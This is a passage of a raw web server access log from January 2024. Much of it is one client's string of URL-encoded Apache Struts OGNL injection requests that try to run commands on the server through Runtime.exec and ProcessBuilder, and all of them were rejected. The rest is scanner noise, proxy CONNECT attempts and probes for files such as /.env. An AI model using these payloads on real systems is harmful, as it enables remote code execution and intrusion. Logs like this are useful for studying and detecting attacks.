5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:28:56 +0100] "GET /host-manager/html?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023_memberAccess.allowStaticMethodAccess%5Cu003dtrue%27%29%28bla%29%28bla%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:28:57 +0100] "GET /host-manager/html?%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%5C75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43mycmd%5C75%5C%27echo%20ccvaevcc%5C%27%27%29%28d%29%29&%28h%29%28%28%27%5C43myret%5C75@java.lang.Runtime@getRuntime%28%29.exec%28%5C43mycmd%29%27%29%28d%29%29&%28i%29%28%28%27%5C43mydat%5C75new%5C40java.io.DataInputStream%28%5C43myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%27%5C43myres%5C75new%5C40byte%5B51020%5D%27%29%28d%29%29&%28k%29%28%28%27%5C43mydat.readFully%28%5C43myres%29%27%29%28d%29%29&%28l%29%28%28%27%5C43mystr%5C75new%5C40java.lang.String%28%5C43myres%29%27%29%28d%29%29&%28m%29%28%28%27%5C43myout%5C75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%27%5C43myout.getWriter%28%29.println%28%5C43mystr%29%27%29%28d%29%29 HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:28:58 +0100] "POST /host-manager/html HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:29:00 +0100] "GET /host-manager/html/devmode.action?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20ccvaevcc%27%29.getInputStream%28%29%29) HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:29:01 +0100] "GET /host-manager/html/devmode.action?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20ccvaevcc%27%29.getInputStream%28%29%29) HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:29:02 +0100] "GET /host-manager/html&key=(%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D=+new+java.lang.Boolean(false),+%23_memberAccess%5B%22allowStaticMethodAccess%22%5D=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27echo%20ccvaevcc%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char%5B51020%5D,%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z%5B(key)(%27meh%27)%5D HTTP/1.0" 404 1992 208.87.206.42 - - [09/Jan/2024:13:29:05 +0100] "GET /host-manager/html&key=(%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D=+new+java.lang.Boolean(false),+%23_memberAccess%5B%22allowStaticMethodAccess%22%5D=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27echo%20ccvaevcc%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char%5B51020%5D,%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z%5B(key)(%27meh%27)%5D HTTP/1.0" 404 1992 208.87.206.42 - - [09/Jan/2024:13:29:05 +0100] "GET /host-manager/html%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D HTTP/1.0" 404 1992 208.87.206.42 - - [09/Jan/2024:13:29:06 +0100] "GET /host-manager/html%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D HTTP/1.0" 404 1992 208.87.206.42 - - [09/Jan/2024:13:29:07 +0100] "GET /host-manager/html?x=%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:29:08 +0100] "GET /host-manager/html?x=%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:29:12 +0100] "GET /host-manager/html/%24%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23m.setAccessible(true)%2C%23m.set(%23_memberAccess%2Ctrue)%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream())%2C%23q%7D.action HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:29:13 +0100] "GET /host-manager/html/%24%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23m.setAccessible(true)%2C%23m.set(%23_memberAccess%2Ctrue)%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream())%2C%23q%7D.action HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:29:13 +0100] "GET /host-manager/html?redirect%3A%24%7B6800810%2B1492036%7D HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:29:14 +0100] "GET /host-manager/html?redirect%3A%24%7B6800810%2B1492036%7D HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:29:14 +0100] "GET /host-manager/html?debug=command&expression=%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B1000%5D%2C%23d.read(%23e)%2C%23resp.println(%23e)%2C%23resp.close() HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:29:16 +0100] "GET /host-manager/html?debug=command&expression=%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B1000%5D%2C%23d.read(%23e)%2C%23resp.println(%23e)%2C%23resp.close() HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:29:17 +0100] "POST /host-manager/html HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:29:18 +0100] "POST /host-manager/html HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:29:18 +0100] "GET /host-manager/html?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context%5B%23parameters.obj%5B0%5D%5D.getWriter().print(%23parameters.content%5B0%5D%2B602%2B53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:29:19 +0100] "GET /host-manager/html?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context%5B%23parameters.obj%5B0%5D%5D.getWriter().print(%23parameters.content%5B0%5D%2B602%2B53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:29:19 +0100] "GET /host-manager/html/%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3D%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23wr.print(%23parameters.content%5B0%5D%2B602%2B53718),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:29:20 +0100] "GET /host-manager/html/%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3D%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23wr.print(%23parameters.content%5B0%5D%2B602%2B53718),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:29:21 +0100] "GET /host-manager/html/(%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3F(%23wr%3D%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23rs%3D@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=echo%20ccvaevcc HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:29:23 +0100] "POST /host-manager/html HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:29:24 +0100] "POST /host-manager/html HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:29:24 +0100] "POST /host-manager/html HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:29:25 +0100] "POST /host-manager/html HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:29:25 +0100] "POST /host-manager/html HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:29:26 +0100] "GET /host-manager/html?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3F(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=echo%20ccvaevcc HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:29:31 +0100] "GET /host-manager/html/%24%7B7519838%2B7992010%7D/index.action HTTP/1.0" 401 2044 208.87.206.42 - - [09/Jan/2024:13:29:32 +0100] "GET /host-manager/html HTTP/1.0" 401 2044 45.128.232.152 - - [09/Jan/2024:14:03:14 +0100] "CONNECT google.com:443 HTTP/1.1" 400 804 125.227.63.113 - - [09/Jan/2024:14:04:43 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 222.116.1.29 - - [09/Jan/2024:14:32:58 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 91.92.252.45 - - [09/Jan/2024:14:37:51 +0100] "CONNECT google.com:443 HTTP/1.1" 400 804 45.95.147.236 - - [09/Jan/2024:15:21:13 +0100] "GET null HTTP/1.1" 400 1994 45.95.147.236 - - [09/Jan/2024:15:21:13 +0100] "GET /z.php HTTP/1.1" 404 723 45.95.147.236 - - [09/Jan/2024:15:21:13 +0100] "GET null HTTP/1.1" 400 1994 45.95.147.236 - - [09/Jan/2024:15:21:13 +0100] "GET /index.php?s=/index/ null" 505 1817 103.180.149.67 - - [09/Jan/2024:15:34:50 +0100] "CONNECT www.google.com:443 HTTP/1.1" 400 804 192.241.203.37 - - [09/Jan/2024:15:37:56 +0100] "GET /hudson HTTP/1.1" 404 724 165.154.164.79 - - [09/Jan/2024:15:59:56 +0100] "-" 400 1930 165.154.164.79 - - [09/Jan/2024:16:00:09 +0100] "GET / HTTP/1.1" 200 1895 165.154.164.79 - - [09/Jan/2024:16:00:31 +0100] "GET /favicon.ico HTTP/1.1" 404 729 165.154.164.79 - - [09/Jan/2024:16:00:32 +0100] "GET /robots.txt HTTP/1.1" 404 728 165.154.164.79 - - [09/Jan/2024:16:00:35 +0100] "GET /sitemap.xml HTTP/1.1" 404 729 193.111.248.5 - - [09/Jan/2024:16:22:34 +0100] "CONNECT google.com:443 HTTP/1.1" 400 804 45.128.232.152 - - [09/Jan/2024:17:04:26 +0100] "CONNECT google.com:443 HTTP/1.1" 400 804 45.95.147.236 - - [09/Jan/2024:17:09:52 +0100] "GET null HTTP/1.1" 400 1994 45.95.147.236 - - [09/Jan/2024:17:09:52 +0100] "GET /z.php HTTP/1.1" 404 723 45.95.147.236 - - [09/Jan/2024:17:09:52 +0100] "GET null HTTP/1.1" 400 1994 45.95.147.236 - - [09/Jan/2024:17:09:52 +0100] "GET /index.php?s=/index/ null" 505 1817 38.222.63.204 - - [09/Jan/2024:17:58:07 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 193.233.134.25 - - [09/Jan/2024:18:09:40 +0100] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 804 193.233.134.25 - - [09/Jan/2024:18:09:41 +0100] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 193.233.134.25 - - [09/Jan/2024:18:09:41 +0100] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 193.233.134.25 - - [09/Jan/2024:18:09:41 +0100] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 804 193.233.134.25 - - [09/Jan/2024:18:09:42 +0100] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 193.233.134.25 - - [09/Jan/2024:18:09:42 +0100] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 193.233.134.25 - - [09/Jan/2024:18:09:43 +0100] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 804 193.233.134.25 - - [09/Jan/2024:18:09:43 +0100] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 804 193.233.134.25 - - [09/Jan/2024:18:09:44 +0100] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 193.233.134.25 - - [09/Jan/2024:18:09:45 +0100] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 159.223.96.6 - - [09/Jan/2024:18:11:00 +0100] "GET /.env HTTP/1.1" 404 722 167.94.138.125 - - [09/Jan/2024:18:25:38 +0100] "GET / HTTP/1.1" 200 1895 167.94.138.125 - - [09/Jan/2024:18:25:41 +0100] "GET / HTTP/1.1" 200 1895 167.94.138.125 - - [09/Jan/2024:18:25:41 +0100] "GET /favicon.ico HTTP/1.1" 404 729 167.94.138.126 - - [09/Jan/2024:19:19:08 +0100] "GET / HTTP/1.1" 200 1895 167.94.138.126 - - [09/Jan/2024:19:19:11 +0100] "GET / HTTP/1.1" 200 1895 167.94.138.126 - - [09/Jan/2024:19:19:13 +0100] "GET /favicon.ico HTTP/1.1" 404 729 146.190.21.14 - - [09/Jan/2024:19:58:57 +0100] "-" 400 1930 146.190.21.14 - - [09/Jan/2024:19:58:57 +0100] "-" 400 1930 146.190.21.14 - - [09/Jan/2024:19:58:57 +0100] "GET / HTTP/1.1" 200 1895 146.190.21.14 - - [09/Jan/2024:19:58:57 +0100] "-" 400 1930 45.128.232.152 - - [09/Jan/2024:21:12:35 +0100] "CONNECT google.com:443 HTTP/1.1" 400 804 198.235.24.44 - - [09/Jan/2024:22:18:17 +0100] "GET / HTTP/1.1" 200 1895 51.159.101.214 - - [09/Jan/2024:23:00:14 +0100] "HEAD / HTTP/1.1" 200 - 51.159.101.214 - - [09/Jan/2024:23:00:16 +0100] "GET / HTTP/1.1" 200 1895 51.159.101.214 - - [09/Jan/2024:23:00:16 +0100] "GET /favicon.ico HTTP/1.1" 404 729 51.159.101.214 - - [09/Jan/2024:23:00:20 +0100] "-" 400 1930 104.248.143.84 - - [09/Jan/2024:23:02:44 +0100] "GET / HTTP/1.1" 200 1895 193.233.134.0 - - [09/Jan/2024:23:30:03 +0100] "CONNECT 185.65.245.50:7227 HTTP/1.1" 400 804 193.233.134.0 - - [09/Jan/2024:23:30:04 +0100] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 193.233.134.0 - - [09/Jan/2024:23:30:04 +0100] "CONNECT 185.65.245.50:7227 HTTP/1.1" 400 804 193.233.134.0 - - [09/Jan/2024:23:30:05 +0100] "CONNECT 185.65.245.50:7227 HTTP/1.1" 400 804 193.233.134.0 - - [09/Jan/2024:23:30:05 +0100] "CONNECT 185.65.245.50:7227 HTTP/1.1" 400 804 193.233.134.0 - - [09/Jan/2024:23:30:05 +0100] "CONNECT 185.65.245.50:7227 HTTP/1.1" 400 804 193.233.134.0 - - [09/Jan/2024:23:30:05 +0100] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 193.233.134.0 - - [09/Jan/2024:23:30:06 +0100] "CONNECT 185.65.245.50:7227 HTTP/1.1" 400 804 193.233.134.0 - - [09/Jan/2024:23:30:07 +0100] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 193.233.134.0 - - [09/Jan/2024:23:30:08 +0100] "CONNECT 185.65.245.10:7227 HTTP/1.1" 400 804 172.105.128.11 - - [09/Jan/2024:23:50:08 +0100] "-" 400 1930